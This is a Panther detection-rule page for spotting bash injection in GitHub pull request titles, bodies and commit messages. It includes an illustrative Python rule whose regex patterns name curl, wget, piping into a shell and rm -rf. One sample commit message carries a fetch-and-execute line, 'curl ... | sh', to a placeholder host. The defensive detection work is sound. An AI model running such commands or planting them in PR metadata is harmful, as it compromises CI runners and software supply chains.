GitHub Malicious Pull Request Titles

Panther Rules

Summary
The GitHub Malicious Pull Request Titles detection rule identifies potential security threats by matching malicious patterns in pull request (PR) titles, descriptions, and commit messages. It focuses specifically on patterns that indicate bash injection attempts, a prevalent attack vector against a repository's continuous integration (CI) workflows: when a workflow interpolates untrusted PR metadata into a shell step, a crafted title can execute in the CI runner. The rule was created after the disclosure of the Nx vulnerability (GHSA-cxm3-wv7p-598c), which demonstrated this risk with PR titles carrying bash command payloads. The rule operates under the premise that malicious actors may submit PRs whose titles contain injections intended to compromise CI execution and repository integrity. It establishes specific thresholds for flagging PRs based on the presence of dangerous commands typically associated with code injection and supply chain attacks. The default detection priority is high, but PRs that do not originate from a cross-fork may be assessed with lower severity, since a same-repository PR already comes from a trusted committer and not every match represents an immediate threat. The rule's effectiveness relies on analysing commits and PR metadata to pinpoint the users and actions that could signify malicious intent.
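The following is an added illustration of the detection logic the summary describes, written in the Panther rule shape (`rule`, `severity`, `title` functions over an event). It is not Panther's published rule: the indicator patterns, the event field names (`pr_title`, `pr_body`, `commit_messages`, `is_cross_fork`) and the sample events are all constructed for this example, and the patterns are deliberately narrow so that ordinary markdown code spans in PR text do not fire.

```python
import re
from typing import Dict, List, Optional

# Constructed indicator patterns (an assumption for this example, not the
# published rule's list). They target shell constructs that would *execute* if
# a CI step interpolated the text into a shell, rather than any mention of a
# command, because PR bodies legitimately contain snippets like `npm test`.
INJECTION_PATTERNS: List[re.Pattern] = [
    re.compile(r"\$\([^)]*\)"),                    # command substitution $(...)
    re.compile(r"\$\{[^}]*[;|&][^}]*\}"),          # ${...} expansion with a chain operator inside
    re.compile(r"[;&|]\s*(?:curl|wget)\s+\S+"),    # download chained after ; & or |
    re.compile(r"\|\s*(?:ba)?sh\b"),               # output piped into a shell
    re.compile(r"(?:^|[;&|])\s*(?:rm\s+-rf|eval|base64\s+-d)\b"),  # destructive/decoder step in a chain
]


def find_injection_indicators(text: Optional[str]) -> List[str]:
    """Return the matched substring for every pattern that fires on text."""
    hits = []
    for pattern in INJECTION_PATTERNS:
        match = pattern.search(text or "")
        if match:
            hits.append(match.group(0))
    return hits


def _candidate_fields(event: Dict) -> List[Optional[str]]:
    """Title, body and every commit message are all attacker-controlled in a PR."""
    return [event.get("pr_title"), event.get("pr_body"), *event.get("commit_messages", [])]


def rule(event: Dict) -> bool:
    """Panther-style rule(): fire when any PR-controlled text carries an indicator."""
    return any(find_injection_indicators(field) for field in _candidate_fields(event))


def severity(event: Dict) -> str:
    """Cross-fork PRs keep HIGH; same-repository PRs are downgraded to MEDIUM."""
    return "HIGH" if event.get("is_cross_fork") else "MEDIUM"


def title(event: Dict) -> str:
    """Alert title naming actor, repository and PR so an analyst can pivot quickly."""
    return (f"Possible bash injection in PR #{event.get('pr_number')} "
            f"by {event.get('actor')} in {event.get('repo')}")


def evaluate(event: Dict) -> Dict:
    """Run the rule and return what an analyst would see for this event."""
    indicators = sorted({hit for field in _candidate_fields(event)
                         for hit in find_injection_indicators(field)})
    matched = rule(event)
    return {
        "matched": matched,
        "severity": severity(event) if matched else None,
        "title": title(event) if matched else None,
        "indicators": indicators,
    }


# Constructed sample events (hypothetical repository, actors and text).
SAMPLE_EVENTS: List[Dict] = [
    {   # benign cross-fork PR; backticks in the body are a markdown code span, not execution
        "actor": "contributor-a", "repo": "example-org/app", "pr_number": 101,
        "is_cross_fork": True, "pr_title": "Fix typo in README",
        "pr_body": "Run `npm test` locally to verify.",
        "commit_messages": ["docs: fix typo"],
    },
    {   # cross-fork PR whose title carries a command substitution
        "actor": "contributor-b", "repo": "example-org/app", "pr_number": 102,
        "is_cross_fork": True, "pr_title": "chore: bump deps $(echo injected)",
        "pr_body": "", "commit_messages": ["chore: bump deps"],
    },
    {   # same-repo PR; the indicator sits in a commit message, so severity is lowered
        "actor": "maintainer", "repo": "example-org/app", "pr_number": 103,
        "is_cross_fork": False, "pr_title": "ci: tighten workflow", "pr_body": "",
        "commit_messages": ["ci: update; curl https://example.invalid/setup.sh | sh"],
    },
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(evaluate(event))
```

Running the block prints one dictionary per sample event: the first does not match, the second matches at HIGH because it is cross-fork, and the third matches at MEDIUM because the same-repository PR is downgraded as the summary describes. Because the indicators are collected across title, body and commit messages, the alert also shows the analyst which field carried the payload, which is what makes the metadata-based attribution of actors and actions practical.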
Categories
  • Web
Data Sources
  • Web Credential
  • Application Log
ATT&CK Techniques
  • T1195.002
  • T1072
Created: 2025-09-09